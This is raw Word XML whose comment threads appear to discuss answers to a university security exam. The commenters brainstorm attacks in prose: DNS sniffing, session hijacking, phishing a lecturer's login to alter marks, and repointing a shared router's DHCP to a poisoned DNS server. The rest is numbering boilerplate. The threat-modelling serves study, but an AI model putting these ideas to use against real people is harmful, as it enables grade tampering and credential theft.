  <w:comment w:initials="PB" w:author="Parker-Jervis, Clovis B" w:date="2021-03-17T21:12:00Z" w:id="11">
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="25446615" w14:textId="275D40AC">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>hmu on teams for the code to try it out btw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="GM" w:author="Graczyk, Maksymilian" w:date="2021-03-17T22:16:00Z" w:id="12">
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="3EC39E0C" w14:textId="26A159A2">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>True, I've just tried using it inside a function of a normal class and it doesn't work as intended :(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="168951BE" w14:textId="19BB9B07">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="5CD39AAD" w14:textId="622D739C">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>So close...</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="PB" w:author="Parker-Jervis, Clovis B" w:date="2021-03-17T21:21:00Z" w:id="13">
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="6AAE1FC9" w14:textId="6EDCDE0C">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">:((( Yeah you're test code doesn't replicate it correctly as `helper` needs to be wrapped in a function itself.  Too close, nearly........ good idea though. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="HR" w:author="Hatout, Rayan" w:date="2021-03-17T18:17:00Z" w:id="15">
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="5752B488" w14:textId="1B64D7AC">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>+1, dest IP is not encrypted in HTTPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="HR" w:author="Hatout, Rayan" w:date="2021-03-17T21:20:00Z" w:id="16">
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="437413BA" w14:textId="1BB4DEB9">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>The destination can still leak by sniffing unencrypted DNS requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="HR" w:author="Hatout, Rayan" w:date="2021-03-17T21:23:00Z" w:id="17">
    <w:p w:rsidR="61D57FC2" w:rsidRDefault="61D57FC2" w14:paraId="21AEF67F" w14:textId="331B2E22">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>So the only way to prevent is to use a VPN I think</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="WR" w:author="Ward, Ryan" w:date="2023-03-23T06:36:44" w:id="636906722">
    <w:p w:rsidR="14E58255" w:rsidRDefault="14E58255" w14:paraId="2EA0BBC6" w14:textId="1AB1B4ED">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r w:rsidR="14E58255">
        <w:rPr/>
        <w:t>Possibly spoofing - same problems as above but using session hijacking to log in as another student?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="WR" w:author="Ward, Ryan" w:date="2023-03-23T06:39:16" w:id="1309144763">
    <w:p w:rsidR="14E58255" w:rsidRDefault="14E58255" w14:paraId="194F9D83" w14:textId="0BF1583B">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r w:rsidR="14E58255">
        <w:rPr/>
        <w:t>Or Elevation of privilege - phishing to obtain lecturer's imperial login, changing their marks / marking themselves as 100 post-exam? Maybe not as secondary marking.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="WR" w:author="Ward, Ryan" w:date="2023-03-23T06:45:43" w:id="1955426794">
    <w:p w:rsidR="14E58255" w:rsidRDefault="14E58255" w14:paraId="0113A60E" w14:textId="1B19586C">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r w:rsidR="14E58255">
        <w:rPr/>
        <w:t>I think this is a valid answer. Main issue with this answer is its a 3rd year exam - students not in halls. Students may have made friends with others on course and live with them? therefore share router with other students taking module. Could be even easier as they likely have access to router admin console, hence change DHCP rule to point to poisoned DNS server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="WR" w:author="Ward, Ryan" w:date="2023-03-23T07:04:27" w:id="131924722">
    <w:p w:rsidR="14E58255" w:rsidRDefault="14E58255" w14:paraId="245B3595" w14:textId="7862FD8C">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r w:rsidR="14E58255">
        <w:rPr/>
        <w:t>They could just assume latest-version, any vulnerabilities in the latest version of gunicorn will be definitely present in the server?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E7AAFD3"/>
  <w15:commentEx w15:done="0" w15:paraId="12F4AE51" w15:paraIdParent="7E7AAFD3"/>
  <w15:commentEx w15:done="0" w15:paraId="0777141C"/>
  <w15:commentEx w15:done="0" w15:paraId="0C91E6CC" w15:paraIdParent="0777141C"/>
  <w15:commentEx w15:done="0" w15:paraId="5BC5916D"/>
  <w15:commentEx w15:done="0" w15:paraId="2A79828C" w15:paraIdParent="5BC5916D"/>
  <w15:commentEx w15:done="0" w15:paraId="6B16C5F3" w15:paraIdParent="5BC5916D"/>
  <w15:commentEx w15:done="0" w15:paraId="3398712C"/>
  <w15:commentEx w15:done="0" w15:paraId="7247779E"/>
  <w15:commentEx w15:done="0" w15:paraId="498DB652" w15:paraIdParent="7247779E"/>
  <w15:commentEx w15:done="0" w15:paraId="031BF077" w15:paraIdParent="7247779E"/>
  <w15:commentEx w15:done="0" w15:paraId="25446615" w15:paraIdParent="7247779E"/>
  <w15:commentEx w15:done="0" w15:paraId="5CD39AAD" w15:paraIdParent="7247779E"/>
  <w15:commentEx w15:done="0" w15:paraId="6AAE1FC9" w15:paraIdParent="7247779E"/>
  <w15:commentEx w15:done="0" w15:paraId="5752B488"/>
  <w15:commentEx w15:done="0" w15:paraId="437413BA"/>
  <w15:commentEx w15:done="0" w15:paraId="21AEF67F" w15:paraIdParent="437413BA"/>
  <w15:commentEx w15:done="0" w15:paraId="2EA0BBC6"/>
  <w15:commentEx w15:done="0" w15:paraId="194F9D83"/>
  <w15:commentEx w15:done="0" w15:paraId="0113A60E"/>
  <w15:commentEx w15:done="0" w15:paraId="245B359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9DB2A2F" w16cex:dateUtc="2023-03-22T17:40:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="27C61D33" w16cex:dateUtc="2023-03-23T00:34:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="50E04DAA" w16cex:dateUtc="2021-03-17T17:23:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="758156FC" w16cex:dateUtc="2021-03-17T18:13:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="07FE0A67" w16cex:dateUtc="2021-03-16T15:37:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="7129880B" w16cex:dateUtc="2021-03-16T15:48:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="53FCDAEC" w16cex:dateUtc="2021-03-17T17:16:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="3B30588B" w16cex:dateUtc="2021-03-16T15:51:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="2413384E" w16cex:dateUtc="2021-03-17T20:32:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="27EA94D4" w16cex:dateUtc="2021-03-17T20:57:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="40D8ECD1" w16cex:dateUtc="2021-03-17T21:12:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="54144875" w16cex:dateUtc="2021-03-17T21:12:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="78BB8462" w16cex:dateUtc="2021-03-17T21:16:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="0264CA78" w16cex:dateUtc="2021-03-17T21:21:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="19F5C862" w16cex:dateUtc="2021-03-17T18:17:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="04F563D7" w16cex:dateUtc="2021-03-17T21:20:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="03A6883C" w16cex:dateUtc="2021-03-17T21:23:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="640DD822" w16cex:dateUtc="2023-03-23T06:36:44.18Z"/>
  <w16cex:commentExtensible w16cex:durableId="41472658" w16cex:dateUtc="2023-03-23T06:39:16.022Z"/>
  <w16cex:commentExtensible w16cex:durableId="18F09596" w16cex:dateUtc="2023-03-23T06:45:43.274Z"/>
  <w16cex:commentExtensible w16cex:durableId="35B01B04" w16cex:dateUtc="2023-03-23T07:04:27.254Z"/>
</w16cex:commentsExtensible>
</file>

<file path=word/commentsIds.xml><?xml version="1.0" encoding="utf-8"?>
<w16cid:commentsIds xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" mc:Ignorable="w16cid">
  <w16cid:commentId w16cid:paraId="7E7AAFD3" w16cid:durableId="19DB2A2F"/>
  <w16cid:commentId w16cid:paraId="12F4AE51" w16cid:durableId="27C61D33"/>
  <w16cid:commentId w16cid:paraId="0777141C" w16cid:durableId="50E04DAA"/>
  <w16cid:commentId w16cid:paraId="0C91E6CC" w16cid:durableId="758156FC"/>
  <w16cid:commentId w16cid:paraId="5BC5916D" w16cid:durableId="07FE0A67"/>
  <w16cid:commentId w16cid:paraId="2A79828C" w16cid:durableId="7129880B"/>
  <w16cid:commentId w16cid:paraId="6B16C5F3" w16cid:durableId="53FCDAEC"/>
  <w16cid:commentId w16cid:paraId="3398712C" w16cid:durableId="3B30588B"/>
  <w16cid:commentId w16cid:paraId="7247779E" w16cid:durableId="2413384E"/>
  <w16cid:commentId w16cid:paraId="498DB652" w16cid:durableId="27EA94D4"/>
  <w16cid:commentId w16cid:paraId="031BF077" w16cid:durableId="40D8ECD1"/>
  <w16cid:commentId w16cid:paraId="25446615" w16cid:durableId="54144875"/>
  <w16cid:commentId w16cid:paraId="5CD39AAD" w16cid:durableId="78BB8462"/>
  <w16cid:commentId w16cid:paraId="6AAE1FC9" w16cid:durableId="0264CA78"/>
  <w16cid:commentId w16cid:paraId="5752B488" w16cid:durableId="19F5C862"/>
  <w16cid:commentId w16cid:paraId="437413BA" w16cid:durableId="04F563D7"/>
  <w16cid:commentId w16cid:paraId="21AEF67F" w16cid:durableId="03A6883C"/>
  <w16cid:commentId w16cid:paraId="2EA0BBC6" w16cid:durableId="640DD822"/>
  <w16cid:commentId w16cid:paraId="194F9D83" w16cid:durableId="41472658"/>
  <w16cid:commentId w16cid:paraId="0113A60E" w16cid:durableId="18F09596"/>
  <w16cid:commentId w16cid:paraId="245B3595" w16cid:durableId="35B01B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0AAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="3D961562">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="92043E86">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="086C6802">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8BF8338A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="90F0D6FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F64C485C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5AC0D50E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1A06CC9C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F7FAD66A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="27E662B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="9DCE4DE0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="DE446B94">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="86D04BEC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FB2EE194">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="79C627D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E3827D64">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D4A43C14">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="479CA45A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7BD2B2C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2ED72D86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="70E20D12">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="DE62E302">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3FA89644">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4D786244">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="405C86BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C994DBEC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="668C6D7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0FFA4216">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C34E08E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4A4E62C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="86F61806">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E4FC587E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="747C1C22">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B2B2E82C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7EE6BF34">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="ADAC287C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A0B6158E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="714ABF5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="633437D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="61B109DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="3DBE31F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0256FA24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E41C9DAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
